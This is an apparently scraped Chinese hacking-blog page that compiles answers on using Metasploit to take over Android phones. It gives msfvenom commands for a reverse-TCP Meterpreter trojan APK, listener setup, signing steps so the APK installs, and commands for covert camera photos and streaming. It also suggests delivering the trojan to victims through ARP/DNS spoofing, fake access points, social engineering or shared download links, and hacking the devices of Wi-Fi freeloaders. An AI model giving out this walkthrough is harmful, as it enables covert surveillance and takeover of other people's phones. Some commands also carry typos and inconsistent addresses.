msf渗透手机工具,MSF工具手机版下载
作者:hacker | 分类:网站入侵 | 浏览:128 | 日期:2022年08月18日目录:
- 1、学校信息安全专业就开了metasploit渗透测试,这门课,老师说学会了这个就很厉害了,是不是啊,
- 2、msf怎么远程监控安卓手机
- 3、如何黑掉蹭网者的手机或者电脑
- 4、如何使用metasploit对安卓手机进行控制
学校信息安全专业就开了metasploit渗透测试,这门课,老师说学会了这个就很厉害了,是不是啊,
metasploit是一个非常牛逼的渗透测试工具,搞渗透的几乎没人不用的。但是只学这个没其他的基础是不行的,metasploit要玩得出彩玩得高端是很多时候根据实际需要自己修改和分析渗透利用脚本,所以好的编程思维和技术也是非常重要的。总之,遵循一点——存在即合理,学校安排的专业课都好好学巴适就对了,甚至需要自己补一些课堂没有的东西。 这里面有metasploit论坛,可以好好逛逛。搞安全的学好了月薪是别人的年薪,学不好就只有打酱油,一个天一个地,没得半灌水的。
msf怎么远程监控安卓手机
既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP
本机IP:192.168.1.6
在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R /root/apk.apk
以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示
msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径
这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具
输入命令:msfconsole
然后输入:
1. use exploit/multi/handler 加载模块
2. set payload android/meterpreter/reverse_tcp 选择Payload
3.show options 查看参数设置
我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置
1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址
2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口
3.exploit 开始执行漏洞 开始监听...
OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件
还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试
安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了
我们可以在我们的MSF里看见有一个会话连接了
这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo
webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头
webcam_snap 隐秘拍照功能
后边跟上参数-i 指定使用那个摄像头拍照
可以看见我们分别对前后摄像头都拍了照 保存到了桌面上
还可以输入命令 webcam_stream 开启摄像头
如何黑掉蹭网者的手机或者电脑
渗透安卓系统,首先你要架设一个伪AP认对方连进来,通过抓包分析对方使用的系统与具体手机型号与安装的应用,目的是找到系统漏洞,后,通过MSF中的利用模块进行渗透,得到sheel后,就需要用安卓的Sandbox来取得root权限,这就需要用本地root漏洞进行提权攻击。
当然也可以在AP上利用DNS伪装技术,将对方访问的任意网站重点向到你的攻击机端口上,这个端口上可以用渗透攻击模块生成攻击页面,取得受限用户访问权限后就可以进行提权,完全控制对方的手机。
是不是不明白?正常的,黑对方设备不是你想的用一个什么软件一按,就大功告成,这样说的人都是骗人的,黑客是通过艰难的学习,掌握技术的前提下举一反三才能成功的。
另外建议你从路由安全着手,保护自己的设备不被非授权访问,对方进来走流量是小事,完全可以通过上述 *** 黑掉你。
另,如果你要学习这门技术,建议搜索metasploit与kali,这两个关键词会带你认识一些需要学习的东西。
如何使用metasploit对安卓手机进行控制
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。
打开vm启动Kali linux。接着打开终端,使用msfvenom *** android利用程序。
Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
现在我们有了一个带有签名的APK,它可以安装在任何设备上。
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit
是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。
1、从下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。
另外要允许安卓安装来历不明的apk。
切换回Kali,我们发现创建了一个新的会话。
然后你就可以为所欲为的操作这台“手机”了。